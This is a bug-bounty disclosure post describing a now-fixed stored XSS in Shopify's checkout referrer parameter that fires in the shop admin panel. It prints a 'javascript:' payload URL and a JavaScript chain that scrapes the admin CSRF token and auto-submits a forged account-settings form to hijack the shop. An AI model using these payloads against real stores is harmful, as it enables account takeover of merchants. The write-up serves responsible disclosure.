To keep up with the security companies we often spend some time on bug bounties. That was a very boring weekend till we found out that Shopify has published their bbp on hackerone. By the time i turned back and forth all my teammates were plugged in. We found many cool vulnerabilities like privilege escalation, a few xss’s and a Oauth redirect bypass.

In this blog post I am going to show you guys how I used a persistent cross site scripting to takeover shops. This vulnerability can be easily exploited and any customer/User can takeover the shop.

When a customer purchases any product from a shop in shopify, they will be redirected to a checkout page. While redirected the request is sent with two other parameters. In those two parameters there is an interesting parameter called referrer. This referrer parameter tracks the customers , for example if there is a “buy now” button embedded on http://example.com and a customer clicks on it to buy a product then this referrer value is reflected in the admin panel of the shop as shown in the screenshot below.

So to takeover the shop, a customer has to simply purchase a product from this address with the referrer parameter set to payload

https://[victims-shopify-address].myshopify.com/cart/[product-id]:1?channel=buy_button&referer=javascript:alert(document.cookie);

Example:

https://madamcury.myshopify.com/cart/1188733065:1?channel=buy_button&referer=javascript:alert(document.cookie);

To make it more fun , We wrote a code to add admins on every click. This way one could takeover a shop!

PS: After reporting this vulnerability shopify has started using CSP , as an extra measure to protect their customers from these kind of vulnerabilities. With CSP it isn’t possible to execute inline script.

 

var xhr = new XMLHttpRequest();
xhr.open("GET", "https://madamcury.myshopify.com/admin/orders", false);
xhr.withCredentials=true;
xhr.send(null);
var token = xhr.responseText;
var pos = token.indexOf("csrf-param");
token=token.substring(pos,token.length).substr(30,44);
alert(token);
document.write("<html><body><form action= 'https://madamcury.myshopify.com/admin/settings/account' method='POST'>
<input type='hidden' name='utf8' value='â&#156;&#147;'>
<input type='hidden' name='authenticity&#95;token' value='"+token+"'/>
<input type='hidden' name='user&#91;first&#95;name&#93;' value='hacked' />
<input type='hidden' name='user&#91;last&#95;name&#93;' value='hacked'>
<input type='hidden' name='user&#91;email&#93;' value='example&#43;hacked&#64;hotmail&#46;com' />
<input type='hidden' name='&#95;method' value='post'>
<input type='submit' value='Submit form'></form>
<script>document.forms[0].submit();</script></body></html>");

 

We reported this vulnerability to Shopify via hackerone. This vulnerability is fixed now and cannot be reproduced.

Shopify rewarded us with a decent bounty , which made our next weekend really amazing.